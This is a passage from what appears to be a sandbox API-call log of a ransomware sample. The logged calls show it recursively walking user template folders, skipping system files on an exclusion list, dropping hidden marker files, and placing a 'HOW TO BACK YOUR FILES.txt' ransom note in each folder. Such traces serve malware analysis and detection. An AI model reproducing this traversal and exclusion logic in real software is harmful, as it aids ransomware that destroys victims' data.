lpString2="Tiger4444.exe") returned -1 [0052.163] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.163] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.163] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x841afb43, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x841afb43, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x841afb43, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.163] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.163] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.163] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0052.163] lstrcmpiW (lpString1="1033", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.163] lstrcmpiW (lpString1="1033", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.163] lstrcmpiW (lpString1="1033", lpString2="Tiger4444.exe") returned -1 [0052.163] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0052.163] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0052.163] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0052.163] lstrcmpiW (lpString1="1033", lpString2="bootmgr") returned -1 [0052.163] lstrcmpiW (lpString1="1033", lpString2="pagefile.sys") returned -1 [0052.163] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0052.163] lstrcmpiW (lpString1="1033", lpString2="ids.txt") returned -1 [0052.163] lstrcmpiW (lpString1="1033", lpString2="NTUSER.DAT") returned -1 [0052.163] lstrcpyW (in: lpString1=0x30aeb58, lpString2="1033" | out: lpString1="1033") returned="1033" [0052.163] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91588 [0052.163] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xba) returned 0xc61df8 [0052.163] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91590 | out: ListHead=0xc66828, ListEntry=0xc91590) returned 0xc91370 [0052.163] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0052.163] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0052.164] lstrcpyW (in: lpString1=0x30aeb58, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.165] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.165] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.165] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.165] CloseHandle (hObject=0x2c8) returned 1 [0052.165] CloseHandle (hObject=0x2ac) returned 1 [0052.166] GetCurrentThreadId () returned 0xfa8 [0052.166] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91590 [0052.166] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0052.166] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61df8 | out: hHeap=0xc50000) returned 1 [0052.166] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91588 | out: hHeap=0xc50000) returned 1 [0052.166] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0052.166] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\" [0052.166] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3" [0052.166] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\1033\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.167] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.169] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.170] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.170] CloseHandle (hObject=0x2ac) returned 1 [0052.171] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned 92 [0052.171] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.171] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841d5d52, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.171] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.171] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.171] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.171] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.171] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841d5d52, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.171] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.171] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.171] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.171] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.172] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.172] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x841d5d52, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x841d5d52, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x841d5d52, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.172] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.172] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.172] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x841d5d52, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x841d5d52, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x841d5d52, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.172] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.172] lstrcpyW (in: lpString1=0x30aeb62, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.172] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\1033\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.172] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.172] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.173] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.173] CloseHandle (hObject=0x2c8) returned 1 [0052.173] CloseHandle (hObject=0x2ac) returned 1 [0052.173] GetCurrentThreadId () returned 0xfa8 [0052.173] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91370 [0052.173] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0052.173] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc84d68 | out: hHeap=0xc50000) returned 1 [0052.173] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91368 | out: hHeap=0xc50000) returned 1 [0052.173] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0052.173] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\" [0052.173] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\.BFC0E91B00AE8A0620D3" [0052.173] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.174] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.176] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.177] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.177] CloseHandle (hObject=0x2ac) returned 1 [0052.177] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned 74 [0052.177] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.177] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841d5d52, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0052.178] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.178] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.178] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.178] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.178] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841d5d52, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.178] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.178] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.178] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.178] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.178] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.178] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x841d5d52, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x841d5d52, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x841d5d52, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.178] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.178] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.178] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2="Tiger4444.exe") returned -1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2=".") returned 1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2="..") returned 1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2="windows") returned -1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2="bootmgr") returned 1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2="pagefile.sys") returned -1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2="boot") returned 1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2="ids.txt") returned -1 [0052.178] lstrcmpiW (lpString1="Document Themes", lpString2="NTUSER.DAT") returned -1 [0052.178] lstrcpyW (in: lpString1=0x30aeb3e, lpString2="Document Themes" | out: lpString1="Document Themes") returned="Document Themes" [0052.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc914e8 [0052.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb6) returned 0xc61df8 [0052.179] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc914f0 | out: ListHead=0xc66828, ListEntry=0xc914f0) returned 0xc914b0 [0052.179] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 0 [0052.179] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0052.179] lstrcpyW (in: lpString1=0x30aeb3e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.181] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.181] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.181] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.181] CloseHandle (hObject=0x2c8) returned 1 [0052.181] CloseHandle (hObject=0x2ac) returned 1 [0052.181] GetCurrentThreadId () returned 0xfa8 [0052.181] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc914f0 [0052.181] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0052.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61df8 | out: hHeap=0xc50000) returned 1 [0052.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc914e8 | out: hHeap=0xc50000) returned 1 [0052.181] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0052.181] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\" [0052.181] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\.BFC0E91B00AE8A0620D3" [0052.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.182] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.184] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.185] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.185] CloseHandle (hObject=0x2ac) returned 1 [0052.186] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned 90 [0052.186] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.186] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841fbfdc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.186] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.186] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.186] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.186] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.186] FindNextFileW (in: hFindFile=0xc72d48, 